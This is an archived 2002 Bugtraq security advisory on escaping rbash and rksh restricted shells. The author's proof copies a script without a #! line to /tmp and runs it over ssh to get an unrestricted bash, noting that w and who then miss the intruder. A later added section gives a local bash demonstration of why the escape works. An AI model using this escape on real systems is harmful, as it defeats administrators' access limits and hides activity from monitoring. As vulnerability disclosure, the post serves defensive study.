Bugtraq mailing list archives

Restricted Shells


From: A.Dimitrov <adimitro () bobcat gcsu edu>
Date: 18 Apr 2002 21:12:23 -0000



I have recently realized a security issue in some
of the restricted shells on *NIX systems. I am not
sure if I am the first one to discover the problem
I am going to discuss but I am sure that it has
not been posted yet, at least not that I know of.

Basically this is the issue:

Affected Systems:
=================
Any Unix systems that I am aware of using
restricted shells (rbash, rksh)

Description:
============
An authorized user that is set to use rbash or
rksh is able to escape the restricted shell
environment and then furthermore exploit the
system. The problem comes from the fact that when a
command is executed from the shell and it is found
to be a shell procedure then rksh or rbash are
invoked to execute it.

Proof:
======

One needs to store the shell script in a
world-writable directory like /tmp or /usr/tmp.
Let's assume the server is running sshd (this
is also exploitable through rsh). In this case
store the following in a file called anything
you want (I will use .tmp123):

---

# no #! line, so the restricted shell runs this file as a shell procedure
/usr/bin/bash
# clean up the dropped script once the unrestricted shell exits
rm -Rf /tmp/.tmp123

---


Then execute the following:

$ scp ./.tmp123 user@host:/tmp

user@host's password:

Done.

$ ssh -l user host '/tmp/.tmp123'
user@host's password:
_


You should now have a normal bash shell instead 
of the original rbash.
Also a great plus to doing this is that whenever
you follow the procedure above the commands 'w'
and 'who' cannot detect your presence. However
'ps' does show the intruder's presence.

Fix:
====
I am not aware of any except maybe an attempt to
retune the system. If anyone has any ideas please
e-mail me.

A. Dimitrov
System Administrator
Georgia College & State University 
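
Added example, not from the original post or its author: a local
demonstration of the mechanism the post relies on, namely that a
restricted bash drops its restrictions when it executes a shell
procedure (a script file with no #! line). It assumes GNU bash is
installed and that invoking it as bash -r behaves the same as rbash;
the scratch directory and the probe script name "probe" are arbitrary
choices for this example. Nothing here needs ssh or a remote host, and
rksh is not exercised.

```shell
# Added demonstration, not part of the original post: a restricted bash
# (bash -r, the same as rbash) refuses "cd", but a script file with no #!
# line that it runs as a shell procedure executes in an unrestricted child
# shell.  Assumes GNU bash is installed; the scratch directory and the name
# "probe" are arbitrary choices for this example.

# Probe used in both cases: prints "restricted" if cd is blocked and
# "escaped" if it works.
PROBE='if cd / 2>/dev/null; then echo escaped; else echo restricted; fi'

# Resolve bash once, because a PATH assignment placed before a command also
# changes where the shell looks that command up.
BASH_BIN=$(command -v bash)

# Case 1: run the probe as a command string directly under bash -r.
# A restricted shell blocks the cd, so this prints "restricted".
restricted_direct() {
    "$BASH_BIN" -r -c "$PROBE"
}

# Case 2: put the same probe in a script with no #! line and run it by name
# from bash -r.  exec(2) fails with ENOEXEC, bash runs the file as a shell
# procedure in a child shell, and that child is not restricted, so the cd
# succeeds and this prints "escaped".
restricted_via_script() {
    dir=$(mktemp -d)
    printf '%s\n' "$PROBE" > "$dir/probe"
    chmod 755 "$dir/probe"
    # PATH names only the scratch directory because rbash rejects command
    # names containing a slash; setting PATH in the environment before the
    # restricted shell starts is not something rbash can prevent.
    PATH="$dir" "$BASH_BIN" -r -c probe
    rm -rf "$dir"
}

# Stand-alone run: the first line shows the restriction holding for a
# command string, the second shows it gone inside the script.
echo "direct:     $(restricted_direct)"
echo "via script: $(restricted_via_script)"
```

The point the probe makes is that the restriction is a property of the
particular shell process, not of the account: the moment rbash hands a
script to a child shell, that child starts without the restricted flag,
which is exactly what the scp-then-ssh sequence in the post exploits.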

